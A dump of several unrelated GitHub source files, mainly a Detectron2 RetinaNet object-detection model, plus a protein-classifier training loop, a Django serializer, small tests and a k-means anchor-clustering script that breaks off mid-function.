param in model.parameters() if param.requires_grad],lr=0.0001)\n \n # learning rate scheduler\n #exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=10, gamma=0.01)\n num_epochs=EPOCHS\n \n iter_valid = 20 # every 10 batch\n iteration4train = 5 # only for 5 of train batches\n iteration_counted = 10000\n \n min_loss = 1000\n \n start_time = time.time()\n iteration = 0\n for epoch in range(num_epochs):\n # epoch start\n print('-'*20)\n print('Start training {}/{}'.format(epoch+1,num_epochs))\n print('-'*20)\n \n # Start Training model\n model.train()\n \n for x,y in train_loader:\n # Clear the grad\n optimizer.zero_grad()\n \n # Put x and y to GPU and get predictions\n x,y = x.to(device),y.to(device)\n outputs = model(x)\n \n # Store the loss\n loss = cost_function(outputs,y.type_as(outputs))\n \n # count and update gradients\n loss.backward()\n optimizer.step()\n #scheduler.step()\n \n #train performance \n iteration += 1\n iteration_counted += 1\n if iteration % iter_valid == 0: \n y_train = torch.tensor([])\n y_tpred = torch.tensor([])\n iteration_counted = 0\n \n if iteration_counted < iteration4train: \n y_train = torch.cat([y_train, y.detach().cpu()])\n y_tpred = torch.cat([y_tpred, outputs.detach().cpu()])\n \n if iteration_counted == iteration4train: \n train_auc = roc_auc_score(y_true=y_train, y_score=y_tpred)\n y_tpred = (y_tpred > 0.5) \n train_acc = accuracy_score(y_true=y_train, y_pred=y_tpred)\n \n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('train batch number:', iteration, ', time:', total_time_str)\n print('train: loss {:.3f}, acc {:.3f}, auc {:.3f}'.format(\n loss, train_acc, train_auc))\n \n print(\"valid performance\")\n model.eval()\n epoch_valid_losses = []\n y_valid = torch.tensor([])\n y_vpred = torch.tensor([])\n for x,y in valid_loader:\n x,y = x.to(device),y.to(device)\n outputs = model(x)\n loss = cost_function(outputs,y.type_as(outputs))\n epoch_valid_losses.append(loss.item())\n \n y_valid = torch.cat([y_valid, y.detach().cpu()])\n y_vpred = torch.cat([y_vpred, outputs.detach().cpu()])\n \n valid_loss = np.mean(epoch_valid_losses)\n valid_auc = roc_auc_score(y_score=y_vpred, y_true=y_valid)\n y_vpred = (y_vpred > 0.5)\n valid_acc = accuracy_score(y_true=y_valid, y_pred=y_vpred)\n \n # Print the result\n print('valid: loss {:.3f}, acc {:.3f}, valid_auc {:.3f}'.format(\n valid_loss, valid_acc, valid_auc))\n \n # if epoch > 0 and float(valid_loss) < min_loss:\n if float(valid_loss) < min_loss:\n print('save the best model\\n')\n min_loss = valid_loss\n \n filename_m = out_dir + 'best_model' + str(foldno) +'.pth'\n torch.save({\n 'state_dict': model.state_dict(),\n 'iteration': iteration,\n 'epoch': epoch,\n }, filename_m)\n \n # epoch ends\n \n print('Finish training.')\n return\n\n#--------------------------------------------------------------------------\n# Make prediction on test data\ndef predict_test(model, test_loader, device):\n print('For test part.....')\n model.eval()\n predictions = torch.tensor([])\n y_test = torch.tensor([])\n for x,y in test_loader:\n x,y = x.to(device),y.to(device)\n predictions = torch.cat([predictions,model(x).detach().cpu()])\n y_test = torch.cat([y_test, y.detach().cpu()])\n predictions = predictions.numpy()\n return predictions, y_test\n\ndef run_test(test_df, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n # Setting up GPU\n\n #device = torch.device('cuda:0' if torch.cuda.is_available else 'cpu')\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n \n test_set = image_set(test_df, DATA_PATH, mode='valid')\n test_loader = DataLoader(\n test_set,\n sampler = SequentialSampler(test_set), \n batch_size = BATCH_SIZE, \n drop_last = False,\n pin_memory=True,\n num_workers = BATCH_SIZE)\n print(\"len of test_loader:\", len(test_loader))\n\n for foldno in range(10):\n # build the model\n model = alphafold.AlphafoldNet()\n model= model.to(device)\n # load the best model\n initial_checkpoint = out_dir + 'best_model' + str(foldno) +'.pth'\n f = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)\n model.load_state_dict(f['state_dict'], strict=True)\n start_iteration = f['iteration']\n start_epoch = f['epoch']\n\n predictions, y_test = predict_test(model, test_loader, device)\n if foldno == 0:\n pred = predictions\n else:\n pred += predictions\n pred /= 10.0\n test_auc = roc_auc_score(y_score=pred, y_true=y_test)\n print(f\"test_auc SCORE: {test_auc}\")\n pred = np.where(pred > 0.5, 1, 0)\n print(\"confusion_matrix\")\n print(confusion_matrix(y_test,pred))\n print(\"testset classification_report\")\n print(classification_report(y_test, pred, digits=4))\n \n print('testing done!')\n \n################################################################\n'''\n\nif __name__ == '__main__':\n\n #load the samples for both postivte and megative samples\n train_df = pd.read_csv(DATA_PATH + \"samples_both.csv\", header=None, names=['sample_id'])\n train_df['label'] = train_df['sample_id'].astype(str).str[-5:-4]\n print(\"train_df\", train_df.head())\n\n #split the train_df into train, validation and test df\n train_df,test_df,_,_ = train_test_split(train_df,train_df,test_size=0.10,random_state=42)\n\n #10 fold training on the remaining train_df dataset\n train_df = train_df.reset_index(drop=True)\n folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df, train_df['label'])):\n print(\"FOLDS : \", n_fold)\n train = train_df.loc[train_idx]\n valid = train_df.loc[valid_idx]\n print('proteins for training: {}, for validation: {}'.format(\n train.shape[0], valid.shape[0]))\n \n train_model(n_fold, train, valid)\n print('training done!')\n\n run_test(test_df)\n\n'''\n\ndef run(DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20):\n #load the samples for both postivte and megative samples\n train_df = pd.read_csv(DATA_PATH + \"samples_both.csv\", header=None, names=['sample_id'])\n train_df['label'] = train_df['sample_id'].astype(str).str[-5:-4]\n print(\"train_df\", train_df.head())\n\n #split the train_df into train, validation and test df\n train_df,test_df,_,_ = train_test_split(train_df,train_df,test_size=0.10,random_state=42)\n\n #10 fold training on the remaining train_df dataset\n train_df = train_df.reset_index(drop=True)\n folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)\n for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df, train_df['label'])):\n print(\"FOLDS : \", n_fold)\n train = train_df.loc[train_idx]\n valid = train_df.loc[valid_idx]\n print('proteins for training: {}, for validation: {}'.format(\n train.shape[0], valid.shape[0]))\n \n train_model(n_fold, train, valid, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20)\n print('training done!')\n\n run_test(test_df, DATA_PATH, out_dir, BATCH_SIZE = 16, EPOCHS = 20)","repo_name":"lonelu/Metalprot_learning","sub_path":"src/trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25040642800","text":"from pathlib import Path\n\nfrom yogoflow.services.video_processor import video_processor\n\n\ntest_video_path = str(Path(__file__).parent / \"test.mp4\")\nout_dir = str(Path(__file__).parent / \"out\" / \"frames\")\n\n\ndef test_extract_frames():\n urls = video_processor.extract_frames(test_video_path, out_dir, step_size=30)\n assert len(urls) == 30\n\n\ndef test_extract_frames_error():\n bad_path = \"not_a_real_file.mp4\"\n urls = video_processor.extract_frames(bad_path, out_dir, step_size=30)\n assert len(urls) == 0\n","repo_name":"dharness/yogoflow","sub_path":"server/tests/test_video_processor.py","file_name":"test_video_processor.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18740525530","text":"import logging\nimport math\nimport time\nimport numpy as np\nfrom typing import List\nimport torch\nfrom fvcore.nn import sigmoid_focal_loss_jit, smooth_l1_loss\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom detectron2.layers import ShapeSpec, batched_nms, cat, get_norm, Conv2d\nfrom detectron2.structures import Boxes, ImageList, Instances, pairwise_iou\nfrom detectron2.utils.events import get_event_storage\nfrom detectron2.utils.logger import log_first_n\nimport detectron2.utils.comm as comm\n\nfrom detectron2.modeling.anchor_generator import build_anchor_generator\nfrom detectron2.modeling.backbone import build_backbone\nfrom detectron2.modeling.box_regression import Box2BoxTransform\nfrom detectron2.modeling.matcher import Matcher\nfrom detectron2.modeling.postprocessing import detector_postprocess\nfrom detectron2.modeling.meta_arch.build import META_ARCH_REGISTRY\n\nfrom torch.cuda import Event\nfrom utils.loop_matcher import LoopMatcher\n\n\n__all__ = [\"RetinaNet_D2\"]\n\n\ndef permute_to_N_HWA_K(tensor, K):\n \"\"\"\n Transpose/reshape a tensor from (N, (A x K), H, W) to (N, (HxWxA), K)\n \"\"\"\n assert tensor.dim() == 4, tensor.shape\n N, _, H, W = tensor.shape\n tensor = tensor.view(N, -1, K, H, W)\n tensor = tensor.permute(0, 3, 4, 1, 2)\n tensor = tensor.reshape(N, -1, K) # Size=(N,HWA,K)\n return tensor\n\n\ndef permute_all_cls_and_box_to_N_HWA_K_and_concat(box_cls, box_delta, num_classes=80):\n \"\"\"\n Rearrange the tensor layout from the network output, i.e.:\n list[Tensor]: #lvl tensors of shape (N, A x K, Hi, Wi)\n to per-image predictions, i.e.:\n Tensor: of shape (N x sum(Hi x Wi x A), K)\n \"\"\"\n # for each feature level, permute the outputs to make them be in the\n # same format as the labels. Note that the labels are computed for\n # all feature levels concatenated, so we keep the same representation\n # for the objectness and the box_delta\n box_cls_flattened = [permute_to_N_HWA_K(x, num_classes) for x in box_cls]\n box_delta_flattened = [permute_to_N_HWA_K(x, 4) for x in box_delta]\n # concatenate on the first dimension (representing the feature levels), to\n # take into account the way the labels were generated (with all feature maps\n # being concatenated as well)\n box_cls = cat(box_cls_flattened, dim=1).view(-1, num_classes)\n box_delta = cat(box_delta_flattened, dim=1).view(-1, 4)\n return box_cls, box_delta\n\n\ndef permute_all_to_NHWA_K_not_concat(box_cls, box_delta, num_classes=80):\n box_cls_flattened = [permute_to_N_HWA_K(x, num_classes).view(-1, num_classes) for x in box_cls]\n box_delta_flattened = [permute_to_N_HWA_K(x, 4).view(-1, 4) for x in box_delta]\n return box_cls_flattened, box_delta_flattened\n\n@META_ARCH_REGISTRY.register()\nclass RetinaNet_D2(nn.Module):\n \"\"\"\n Implement RetinaNet in :paper:`RetinaNet`.\n \"\"\"\n\n def __init__(self, cfg):\n super().__init__()\n\n # fmt: off\n self.num_classes = cfg.MODEL.RETINANET.NUM_CLASSES\n self.in_features = cfg.MODEL.RETINANET.IN_FEATURES\n # Loss parameters:\n self.focal_loss_alpha = cfg.MODEL.CUSTOM.FOCAL_LOSS_ALPHAS\n self.focal_loss_gamma = cfg.MODEL.CUSTOM.FOCAL_LOSS_GAMMAS\n self.cls_weights = cfg.MODEL.CUSTOM.CLS_WEIGHTS\n self.reg_weights = cfg.MODEL.CUSTOM.REG_WEIGHTS\n self.smooth_l1_loss_beta = cfg.MODEL.RETINANET.SMOOTH_L1_LOSS_BETA\n # Inference parameters:\n self.score_threshold = cfg.MODEL.RETINANET.SCORE_THRESH_TEST\n self.topk_candidates = cfg.MODEL.RETINANET.TOPK_CANDIDATES_TEST\n self.nms_threshold = cfg.MODEL.RETINANET.NMS_THRESH_TEST\n self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE\n # Vis parameters\n self.vis_period = cfg.VIS_PERIOD\n self.input_format = cfg.INPUT.FORMAT\n self.scale_factor = 1\n # fmt: on\n\n self.backbone = build_backbone(cfg)\n\n backbone_shape = self.backbone.output_shape()\n feature_shapes = [backbone_shape[f] for f in self.in_features]\n self.head = RetinaNetHead(cfg, feature_shapes)\n self.anchor_generator = build_anchor_generator(cfg, feature_shapes)\n\n # Matching and loss\n self.box2box_transform = Box2BoxTransform(weights=cfg.MODEL.RPN.BBOX_REG_WEIGHTS)\n if cfg.MODEL.CUSTOM.USE_LOOP_MATCHER:\n self.matcher = LoopMatcher(\n cfg.MODEL.RETINANET.IOU_THRESHOLDS,\n cfg.MODEL.RETINANET.IOU_LABELS,\n allow_low_quality_matches=True,\n )\n else:\n self.matcher = Matcher(\n cfg.MODEL.RETINANET.IOU_THRESHOLDS,\n cfg.MODEL.RETINANET.IOU_LABELS,\n allow_low_quality_matches=True,\n )\n\n self.register_buffer(\"pixel_mean\", torch.Tensor(cfg.MODEL.PIXEL_MEAN).view(-1, 1, 1))\n self.register_buffer(\"pixel_std\", torch.Tensor(cfg.MODEL.PIXEL_STD).view(-1, 1, 1))\n\n \"\"\"\n In Detectron1, loss is normalized by number of foreground samples in the batch.\n When batch size is 1 per GPU, #foreground has a large variance and\n using it lead to lower performance. Here we maintain an EMA of #foreground to\n stabilize the normalizer.\n \"\"\"\n self.loss_normalizer = 100 # initialize with any reasonable #fg that's not too small\n self.loss_normalizer_momentum = 0.9\n\n self.iter = 0\n self.class_stat = [0 for _ in range(10)]\n\n @property\n def device(self):\n return self.pixel_mean.device\n\n\n def visualize_training(self, batched_inputs, results):\n from detectron2.utils.visualizer import Visualizer\n\n assert len(batched_inputs) == len(\n results\n ), \"Cannot visualize inputs and results of different sizes\"\n storage = get_event_storage()\n max_boxes = 20\n\n image_index = 0 # only visualize a single image\n img = batched_inputs[image_index][\"image\"].cpu().numpy()\n assert img.shape[0] == 3, \"Images should have 3 channels.\"\n if self.input_format == \"BGR\":\n img = img[::-1, :, :]\n img = img.transpose(1, 2, 0)\n v_gt = Visualizer(img, None)\n v_gt = v_gt.overlay_instances(boxes=batched_inputs[image_index][\"instances\"].gt_boxes)\n anno_img = v_gt.get_image()\n processed_results = detector_postprocess(results[image_index], img.shape[0], img.shape[1])\n predicted_boxes = processed_results.pred_boxes.tensor.detach().cpu().numpy()\n\n v_pred = Visualizer(img, None)\n v_pred = v_pred.overlay_instances(boxes=predicted_boxes[0:max_boxes])\n prop_img = v_pred.get_image()\n vis_img = np.vstack((anno_img, prop_img))\n vis_img = vis_img.transpose(2, 0, 1)\n vis_name = f\"Top: GT bounding boxes; Bottom: {max_boxes} Highest Scoring Results\"\n storage.put_image(vis_name, vis_img)\n\n\n def forward(self, batched_inputs):\n start_event = Event(enable_timing=True)\n end_event = Event(enable_timing=True)\n\n images = self.preprocess_image(batched_inputs)\n if \"instances\" in batched_inputs[0]:\n gt_instances = [x[\"instances\"].to(self.device) for x in batched_inputs]\n elif \"targets\" in batched_inputs[0]:\n log_first_n(\n logging.WARN, \"'targets' in the model inputs is now renamed to 'instances'!\", n=10\n )\n gt_instances = [x[\"targets\"].to(self.device) for x in batched_inputs]\n else:\n gt_instances = None\n \n start_event.record()\n\n features = self.backbone(images.tensor)\n features = [features[f] for f in self.in_features]\n box_cls, box_delta = self.head(features)\n anchors = self.anchor_generator(features)\n\n if self.training:\n # torch.cuda.empty_cache()\n # gt_classes, gt_anchors_reg_deltas = self.get_ground_truth(anchors, gt_instances)\n # losses = self.losses(gt_classes, gt_anchors_reg_deltas, box_cls, box_delta)\n\n gt_classes, gt_deltas = self.get_det_gt(anchors, gt_instances)\n losses = self.det_loss(gt_classes, gt_deltas, box_cls, box_delta, self.focal_loss_alpha, self.focal_loss_gamma, self.cls_weights, self.reg_weights)\n\n\n if self.vis_period > 0:\n storage = get_event_storage()\n if storage.iter % self.vis_period == 0:\n results = self.inference(box_cls, box_delta, anchors, images.image_sizes)\n self.visualize_training(batched_inputs, results)\n\n return losses\n else:\n results = self.inference(box_cls, box_delta, anchors, images.image_sizes)\n end_event.record()\n torch.cuda.synchronize()\n total_time = start_event.elapsed_time(end_event)\n processed_results = []\n for results_per_image, input_per_image, image_size in zip(\n results, batched_inputs, images.image_sizes\n ):\n height = input_per_image.get(\"height\", image_size[0])\n width = input_per_image.get(\"width\", image_size[1])\n r = detector_postprocess(results_per_image, height, width)\n processed_results.append({\"instances\": r, 'time':total_time})\n return processed_results\n\n\n @torch.no_grad()\n def get_det_gt(self, anchors, targets):\n gt_classes = []\n gt_anchors_deltas = []\n anchor_layers = len(anchors)\n anchor_lens = [len(x) for x in anchors]\n start_inds = [0] + [sum(anchor_lens[:i]) for i in range(1, len(anchor_lens))]\n end_inds = [sum(anchor_lens[:i+1]) for i in range(len(anchor_lens))]\n anchors = Boxes.cat(anchors) # Rx4\n\n for targets_per_image in targets:\n if type(self.matcher) == Matcher:\n match_quality_matrix = pairwise_iou(targets_per_image.gt_boxes, anchors)\n gt_matched_idxs, anchor_labels = self.matcher(match_quality_matrix)\n del(match_quality_matrix)\n else:\n gt_matched_idxs, anchor_labels = self.matcher(targets_per_image.gt_boxes, anchors)\n\n has_gt = len(targets_per_image) > 0\n if has_gt:\n # ground truth box regression\n matched_gt_boxes = targets_per_image.gt_boxes[gt_matched_idxs]\n gt_anchors_reg_deltas_i = self.box2box_transform.get_deltas(\n anchors.tensor, matched_gt_boxes.tensor\n )\n\n gt_classes_i = targets_per_image.gt_classes[gt_matched_idxs]\n # Anchors with label 0 are treated as background.\n gt_classes_i[anchor_labels == 0] = self.num_classes\n # Anchors with label -1 are ignored.\n gt_classes_i[anchor_labels == -1] = -1\n\n else:\n gt_classes_i = torch.zeros_like(gt_matched_idxs) + self.num_classes\n gt_anchors_reg_deltas_i = torch.zeros_like(anchors.tensor)\n\n gt_classes.append([gt_classes_i[s:e] for s, e in zip(start_inds, end_inds)])\n gt_anchors_deltas.append([gt_anchors_reg_deltas_i[s:e] for s, e in zip(start_inds, end_inds)])\n \n gt_classes = [torch.stack([x[i] for x in gt_classes]) for i in range(anchor_layers)]\n gt_anchors_deltas = [torch.stack([x[i] for x in gt_anchors_deltas]) for i in range(anchor_layers)]\n\n gt_classes = torch.cat([x.flatten() for x in gt_classes])\n gt_anchors_deltas = torch.cat([x.reshape(-1, 4) for x in gt_anchors_deltas])\n\n return gt_classes, gt_anchors_deltas\n\n\n def det_loss(self, gt_classes, gt_anchors_deltas, pred_logits, pred_deltas, alphas, gammas, cls_weights, reg_weights):\n def convert_gt_cls(logits, gt_class, f_idxs):\n gt_classes_target = torch.zeros_like(logits)\n gt_classes_target[f_idxs, gt_class[f_idxs]] = 1\n return gt_classes_target\n\n assert len(cls_weights) == len(pred_logits)\n assert len(cls_weights) == len(reg_weights)\n\n pred_logits, pred_deltas = permute_all_to_NHWA_K_not_concat(pred_logits, pred_deltas, self.num_classes)\n \n lengths = [x.shape[0] for x in pred_logits]\n start_inds = [0] + [sum(lengths[:i]) for i in range(1, len(lengths))]\n end_inds = [sum(lengths[:i+1]) for i in range(len(lengths))]\n \n gt_classes = gt_classes.flatten()\n gt_anchors_deltas = gt_anchors_deltas.view(-1, 4)\n\n valid_idxs = gt_classes >= 0\n foreground_idxs = (gt_classes >= 0) & (gt_classes != self.num_classes)\n num_foreground = foreground_idxs.sum().item()\n get_event_storage().put_scalar(\"num_foreground\", num_foreground)\n self.loss_normalizer = (\n self.loss_normalizer_momentum * self.loss_normalizer\n + (1 - self.loss_normalizer_momentum) * num_foreground\n )\n gt_clsses_list = [gt_classes[s:e] for s, e in zip(start_inds, end_inds)]\n gt_anchors_deltas_list = [gt_anchors_deltas[s:e] for s, e in zip(start_inds, end_inds)]\n valid_idxs_list = [valid_idxs[s:e] for s, e in zip(start_inds, end_inds)]\n foreground_idxs_list = [foreground_idxs[s:e] for s, e in zip(start_inds, end_inds)]\n\n loss_cls = [\n w * sigmoid_focal_loss_jit(\n x[v],\n convert_gt_cls(x, g, f)[v].detach(),\n alpha=alpha,\n gamma=gamma,\n reduction=\"sum\"\n ) \n for w, x, g, v, f, alpha, gamma in zip(cls_weights, pred_logits, gt_clsses_list, valid_idxs_list, foreground_idxs_list, alphas, gammas)\n ]\n \n loss_box_reg = [\n w * smooth_l1_loss(\n x[f], \n g[f].detach(),\n beta=self.smooth_l1_loss_beta,\n reduction=\"sum\"\n )\n for w, x, g, f in zip(reg_weights, pred_deltas, gt_anchors_deltas_list, foreground_idxs_list)\n ]\n \n loss_cls = sum(loss_cls) / max(1., self.loss_normalizer)\n loss_box_reg = sum(loss_box_reg) / max(1., self.loss_normalizer)\n return {\"loss_cls\": loss_cls, \"loss_box_reg\": loss_box_reg}\n\n\n def inference(self, box_cls, box_delta, anchors, image_sizes):\n \"\"\"\n Arguments:\n box_cls, box_delta: Same as the output of :meth:`RetinaNetHead.forward`\n anchors (list[Boxes]): A list of #feature level Boxes.\n The Boxes contain anchors of this image on the specific feature level.\n image_sizes (List[torch.Size]): the input image sizes\n\n Returns:\n results (List[Instances]): a list of #images elements.\n \"\"\"\n results = []\n times = []\n\n box_cls = [permute_to_N_HWA_K(x, self.num_classes) for x in box_cls]\n box_delta = [permute_to_N_HWA_K(x, 4) for x in box_delta]\n\n for img_idx, image_size in enumerate(image_sizes):\n box_cls_per_image = [box_cls_per_level[img_idx] for box_cls_per_level in box_cls]\n box_reg_per_image = [box_reg_per_level[img_idx] for box_reg_per_level in box_delta]\n results_per_image = self.inference_single_image(\n box_cls_per_image, box_reg_per_image, anchors, (image_size[0]*self.scale_factor, image_size[1]*self.scale_factor)\n )\n results.append(results_per_image)\n return results\n\n\n def inference_single_image(self, box_cls, box_delta, anchors, image_size):\n \"\"\"\n Single-image inference. Return bounding-box detection results by thresholding\n on scores and applying non-maximum suppression (NMS).\n\n Arguments:\n box_cls (list[Tensor]): list of #feature levels. Each entry contains\n tensor of size (H x W x A, K)\n box_delta (list[Tensor]): Same shape as 'box_cls' except that K becomes 4.\n anchors (list[Boxes]): list of #feature levels. Each entry contains\n a Boxes object, which contains all the anchors for that\n image in that feature level.\n image_size (tuple(H, W)): a tuple of the image height and width.\n\n Returns:\n Same as `inference`, but for only one image.\n \"\"\"\n boxes_all = []\n scores_all = []\n class_idxs_all = []\n\n # Iterate over every feature level\n for box_cls_i, box_reg_i, anchors_i in zip(box_cls, box_delta, anchors):\n # (HxWxAxK,)\n box_cls_i = box_cls_i.flatten().sigmoid_()\n\n # Keep top k top scoring indices only.\n num_topk = min(self.topk_candidates, box_reg_i.size(0))\n # torch.sort is actually faster than .topk (at least on GPUs)\n predicted_prob, topk_idxs = box_cls_i.sort(descending=True)\n predicted_prob = predicted_prob[:num_topk]\n topk_idxs = topk_idxs[:num_topk]\n\n # filter out the proposals with low confidence score\n keep_idxs = predicted_prob > self.score_threshold\n predicted_prob = predicted_prob[keep_idxs]\n topk_idxs = topk_idxs[keep_idxs]\n\n anchor_idxs = topk_idxs // self.num_classes\n classes_idxs = topk_idxs % self.num_classes\n\n box_reg_i = box_reg_i[anchor_idxs]\n anchors_i = anchors_i[anchor_idxs]\n # predict boxes\n predicted_boxes = self.box2box_transform.apply_deltas(box_reg_i, anchors_i.tensor)\n\n boxes_all.append(predicted_boxes)\n scores_all.append(predicted_prob)\n class_idxs_all.append(classes_idxs)\n\n boxes_all, scores_all, class_idxs_all = [\n cat(x) for x in [boxes_all, scores_all, class_idxs_all]\n ]\n \n keep = batched_nms(boxes_all, scores_all, class_idxs_all, self.nms_threshold)\n \n keep = keep[: self.max_detections_per_image]\n\n result = Instances(image_size)\n result.pred_boxes = Boxes(boxes_all[keep])\n result.scores = scores_all[keep]\n result.pred_classes = class_idxs_all[keep]\n return result\n\n\n def preprocess_image(self, batched_inputs):\n \"\"\"\n Normalize, pad and batch the input images.\n \"\"\"\n images = [x[\"image\"].to(self.device) for x in batched_inputs]\n images = [(x - self.pixel_mean) / self.pixel_std for x in images]\n images = ImageList.from_tensors(images, self.backbone.size_divisibility)\n return images\n\n\nclass RetinaNetHead(nn.Module):\n \"\"\"\n The head used in RetinaNet for object classification and box regression.\n It has two subnets for the two tasks, with a common structure but separate parameters.\n \"\"\"\n\n def __init__(self, cfg, input_shape: List[ShapeSpec]):\n super().__init__()\n # fmt: off\n in_channels = input_shape[0].channels\n num_classes = cfg.MODEL.RETINANET.NUM_CLASSES\n num_convs = cfg.MODEL.RETINANET.NUM_CONVS\n prior_prob = cfg.MODEL.RETINANET.PRIOR_PROB\n num_anchors = build_anchor_generator(cfg, input_shape).num_cell_anchors\n # fmt: on\n assert (\n len(set(num_anchors)) == 1\n ), \"Using different number of anchors between levels is not currently supported!\"\n num_anchors = num_anchors[0]\n\n cls_subnet = []\n bbox_subnet = []\n for _ in range(num_convs):\n cls_subnet.append(\n nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)\n )\n cls_subnet.append(nn.ReLU())\n bbox_subnet.append(\n nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)\n )\n bbox_subnet.append(nn.ReLU())\n\n self.cls_subnet = nn.Sequential(*cls_subnet)\n self.bbox_subnet = nn.Sequential(*bbox_subnet)\n self.cls_score = nn.Conv2d(\n in_channels, num_anchors * num_classes, kernel_size=3, stride=1, padding=1\n )\n self.bbox_pred = nn.Conv2d(in_channels, num_anchors * 4, kernel_size=3, stride=1, padding=1)\n\n # Initialization\n for modules in [self.cls_subnet, self.bbox_subnet, self.cls_score, self.bbox_pred]:\n for layer in modules.modules():\n if isinstance(layer, nn.Conv2d):\n #torch.nn.init.xavier_normal_(layer.weight)\n torch.nn.init.normal_(layer.weight, mean=0, std=0.01)\n torch.nn.init.constant_(layer.bias, 0)\n \n # Use prior in model initialization to improve stability\n bias_value = -(math.log((1 - prior_prob) / prior_prob))\n torch.nn.init.constant_(self.cls_score.bias, bias_value)\n\n def forward(self, features):\n \"\"\"\n Arguments:\n features (list[Tensor]): FPN feature map tensors in high to low resolution.\n Each tensor in the list correspond to different feature levels.\n\n Returns:\n logits (list[Tensor]): #lvl tensors, each has shape (N, AxK, Hi, Wi).\n The tensor predicts the classification probability\n at each spatial position for each of the A anchors and K object\n classes.\n bbox_reg (list[Tensor]): #lvl tensors, each has shape (N, Ax4, Hi, Wi).\n The tensor predicts 4-vector (dx,dy,dw,dh) box\n regression values for every anchor. These values are the\n relative offset between the anchor and the ground truth box.\n \"\"\"\n logits = []\n bbox_reg = []\n for feature in features:\n logits.append(self.cls_score(self.cls_subnet(feature)))\n bbox_reg.append(self.bbox_pred(self.bbox_subnet(feature)))\n return logits, bbox_reg\n","repo_name":"ChenhongyiYang/QueryDet-PyTorch","sub_path":"models/retinanet/retinanet.py","file_name":"retinanet.py","file_ext":"py","file_size_in_byte":21851,"program_lang":"python","lang":"en","doc_type":"code","stars":371,"dataset":"github-code","pt":"21"} +{"seq_id":"326135999","text":"from django.conf import settings\n\nfrom rest_framework import serializers\n\nfrom apps.users.models import User\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = (\n \"id\",\n \"email\",\n \"name\",\n \"created_at\",\n )\n read_only_fields = (\n \"created_at\",\n )\n \n ","repo_name":"md-sahil-11/django-starter","sub_path":"apps/users/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22865885401","text":"print(\"1 number\")\nn1 = int(input(\"->\"))\nprint(\"2 number\")\nn2 = int(input(\"->\"))\n\ntry:\n f = 0\n for i in range(n1, n2+1):\n if i % 9 == 0:\n if i % 2 == 0:\n f = f + i\n print(f\"Сума парних чисел {f}\")\n\n if i % 2 == 1:\n f = f + i\n print(f\"Сума непарних чисел {f}\")\nexcept Exception as ex:\n print(\"Error\", ex)","repo_name":"k2supra/Collector_Python","sub_path":"Try-catch/ex_4/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351739202","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef iou(boxes, clusters):\n \"\"\"\n Calculates the Intersection over Union (IoU) between N boxes and K clusters.\n :param boxes: numpy array of shape (n, 2) where n is the number of box, shifted to the origin (i. e. width and height)\n :param clusters: numpy array of shape (k, 2) where k is the number of clusters\n :return: numpy array of shape (n, k) where k is the number of clusters\n \"\"\"\n N = boxes.shape[0]\n K = clusters.shape[0]\n iw = np.minimum(\n np.broadcast_to(boxes[:, np.newaxis, 0], (N, K)), # (N, 1) -> (N, K)\n np.broadcast_to(clusters[np.newaxis, :, 0], (N, K)) # (1, K) -> (N, K)\n )\n ih = np.minimum(\n np.broadcast_to(boxes[:, np.newaxis, 1], (N, K)),\n np.broadcast_to(clusters[np.newaxis, :, 1], (N, K))\n )\n if np.count_nonzero(iw == 0) > 0 or np.count_nonzero(ih == 0) > 0:\n raise ValueError(\"Some box has no area\")\n\n intersection = iw * ih # (N, K)\n boxes_area = np.broadcast_to((boxes[:, np.newaxis, 0] * boxes[:, np.newaxis, 1]), (N, K))\n clusters_area = np.broadcast_to((clusters[np.newaxis, :, 0] * clusters[np.newaxis, :, 1]), (N, K))\n\n iou_ = intersection / (boxes_area + clusters_area - intersection + 1e-7)\n\n return iou_\n\ndef avg_iou(boxes, clusters):\n \"\"\"\n Calculates the average Intersection over Union (IoU) between a numpy array of boxes and k clusters.\n :param boxes: numpy array of shape (r, 2), where r is the number of rows\n :param clusters: numpy array of shape (k, 2) where k is the number of clusters\n :return: average IoU as a single float\n \"\"\"\n return np.mean(np.max(iou(boxes, clusters), axis=1))\n\ndef translate_boxes(boxes):\n \"\"\"\n Translates all the boxes to the origin.\n :param boxes: numpy array of shape (r, 4)\n :return: numpy array of shape (r, 2)\n \"\"\"\n new_boxes = boxes.copy()\n for row in range(new_boxes.shape[0]):\n new_boxes[row][2] = np.abs(new_boxes[row][2] - new_boxes[row][0])\n new_boxes[row][3] = np.abs(new_boxes[row][3] - new_boxes[row][1])\n return np.delete(new_boxes, [0, 1], axis=1)\n\ndef kmeans(boxes, k, dist=np.median):\n \"\"\"\n Calculates k-means clustering with the Intersection over Union (IoU) metric.\n :param boxes: numpy array of shape (r, 2), where r is the number of rows\n :param k: number of clusters\n :param dist: distance function\n :return: numpy array of shape (k, 2)\n \"\"\"\n rows = boxes.shape[0]\n\n distances = np.empty((rows, k))\n last_clusters = np.zeros((rows,))\n\n 